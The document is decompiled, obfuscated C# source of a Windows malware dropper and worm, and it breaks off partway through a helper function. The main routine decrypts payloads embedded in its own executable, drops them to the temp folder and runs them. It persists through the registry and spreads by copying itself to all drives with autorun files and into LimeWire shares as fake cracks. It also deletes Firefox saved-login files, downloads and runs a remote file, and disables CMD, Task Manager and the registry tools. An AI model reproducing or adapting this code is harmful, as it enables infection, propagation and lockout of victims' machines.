public sealed class JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97
|
|
||||||
{
|
|
||||||
[STAThread]
|
|
||||||
public static void Main()
|
|
||||||
{
|
|
||||||
string[] strArray1 = Strings.Split(File.ReadAllText(Application.ExecutablePath), "&^Q@#&*$^*&!@$");
|
|
||||||
string[] strArray2 = Strings.Split(rp.eqwrsdafasdf(strArray1[1], strArray1[2]), "AJJFIOEURASJFKLJSAIODF");
|
|
||||||
if (Operators.CompareString(strArray2[1], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
if (strArray2[11].Contains(".exe"))
|
|
||||||
{
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUxz(Encoding.Default.GetBytes(strArray2[1]));
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[11], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[1], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[11]);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[2], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[12], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[2], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[12]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[3], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[13], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[3], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[13]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[4], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[14], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[4], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[14]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[5], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[15], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[5], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[15]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[6], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[16], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[6], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[16]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[7], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[17], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[7], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[17]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[8], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[18], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[8], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[18]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[9], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[19], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[9], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[19]);
|
|
||||||
}
|
|
||||||
if (Operators.CompareString(strArray2[10], "SHIT", false) != 0)
|
|
||||||
{
|
|
||||||
FileSystem.FileOpen(5, Path.GetTempPath() + strArray2[20], OpenMode.Binary, OpenAccess.ReadWrite);
|
|
||||||
FileSystem.FilePut(5, strArray2[10], -1L, false);
|
|
||||||
FileSystem.FileClose(5);
|
|
||||||
Process.Start(Path.GetTempPath() + strArray2[20]);
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[21]))
|
|
||||||
{
|
|
||||||
JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU16(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "~`rdrFZ"));
|
|
||||||
JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU16(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "^@^GT]T"));
|
|
||||||
JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU17();
|
|
||||||
JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU18();
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[22]))
|
|
||||||
{
|
|
||||||
if (!File.Exists(Path.GetTempPath() + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "^@PX_UZT\u0019TKV")))
|
|
||||||
File.Copy(Assembly.GetExecutingAssembly().Location, Path.GetTempPath() + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "^@PX_UZT\u0019TKV"));
|
|
||||||
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "@\\UCFRAVk|ZPAXB\\UGkfZ]WXF@opBCAV]CgVA@^^]oaB_"), true);
|
|
||||||
registryKey.SetValue(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "~ZPE^@\\UC\u0011p\\]QXTFAVEZ\\]"), (object) (Path.GetTempPath() + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "^@PX_UZT\u0019TKV")));
|
|
||||||
registryKey.Close();
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[23]))
|
|
||||||
{
|
|
||||||
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
|
|
||||||
if (Directory.Exists(str))
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
|
|
||||||
{
|
|
||||||
try
|
|
||||||
{
|
|
||||||
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
|
|
||||||
{
|
|
||||||
if (file.Contains("signon"))
|
|
||||||
MyProject.Computer.FileSystem.DeleteFile(file);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator<string> enumerator;
|
|
||||||
enumerator?.Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
finally
|
|
||||||
{
|
|
||||||
IEnumerator<string> enumerator;
|
|
||||||
enumerator?.Dispose();
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[24]))
|
|
||||||
{
|
|
||||||
string[] logicalDrives = Directory.GetLogicalDrives();
|
|
||||||
int index = 0;
|
|
||||||
while (index < logicalDrives.Length)
|
|
||||||
{
|
|
||||||
string str = logicalDrives[index];
|
|
||||||
if (!File.Exists(str + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "@VGBA\u001DVKR")))
|
|
||||||
File.Copy(Assembly.GetExecutingAssembly().Location, str + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "@VGBA\u001DVKR"));
|
|
||||||
StreamWriter streamWriter = new StreamWriter(str + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "RFGXCF]\u001D^_U"));
|
|
||||||
streamWriter.WriteLine(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "hRFC^AF]j"));
|
|
||||||
streamWriter.WriteLine(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "\\CVY\f@VGBA\u001DVKR"));
|
|
||||||
streamWriter.WriteLine(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "@[V[]VKVTDGV\u000EDTGFC\u0019TKV"));
|
|
||||||
streamWriter.Close();
|
|
||||||
File.SetAttributes(str + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("13337", "RFGXCF]\u001D^_U"), FileAttributes.Hidden);
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[25]))
|
|
||||||
JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU26("C:\\", Application.ExecutablePath);
|
|
||||||
if (Conversions.ToBoolean(strArray2[26]))
|
|
||||||
{
|
|
||||||
int num = 0;
|
|
||||||
foreach (object obj in new ArrayList()
|
|
||||||
{
|
|
||||||
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\limewire\\shared\\")
|
|
||||||
})
|
|
||||||
{
|
|
||||||
string path = Convert.ToString(RuntimeHelpers.GetObjectValue(obj));
|
|
||||||
if (Directory.Exists(path))
|
|
||||||
{
|
|
||||||
string[] directories = Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
|
|
||||||
int index = 0;
|
|
||||||
while (index < directories.Length)
|
|
||||||
{
|
|
||||||
string str = directories[index];
|
|
||||||
string destFileName = path + "\\" + str.Substring(str.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
|
|
||||||
File.Copy(Process.GetCurrentProcess().MainModule.FileName, destFileName, true);
|
|
||||||
checked { ++num; }
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[27]))
|
|
||||||
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
|
|
||||||
if (Conversions.ToBoolean(strArray2[28]))
|
|
||||||
{
|
|
||||||
MyProject.Computer.Network.DownloadFile(strArray2[33], Path.GetTempPath() + "msconfigdl.exe");
|
|
||||||
Process.Start(Path.GetTempPath() + "msconfigdl.exe");
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[29]))
|
|
||||||
Process.Start(strArray2[34]);
|
|
||||||
if (Conversions.ToBoolean(strArray2[30]))
|
|
||||||
{
|
|
||||||
StreamWriter streamWriter = new StreamWriter(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("SAFDFAF", "\u0002|\u0018\u0011((7.17\u001A\u0012? 5#)us\u001A73/2#35\u000F$2'\u001A)) 55"));
|
|
||||||
string str = Conversions.ToString(Operators.CompareString("\n" + JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU97.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415("SAFDFAF", "ptshqhcowd161}7/6322<5'(h"), ")", false) > 0);
|
|
||||||
streamWriter.Write(str);
|
|
||||||
streamWriter.Close();
|
|
||||||
}
|
|
||||||
if (Conversions.ToBoolean(strArray2[31]))
|
|
||||||
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
|
|
||||||
if (!Conversions.ToBoolean(strArray2[32]))
|
|
||||||
return;
|
|
||||||
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDU591415(
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUas,
|
|
||||||
string JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUdaze)
|
|
||||||
{
|
|
||||||
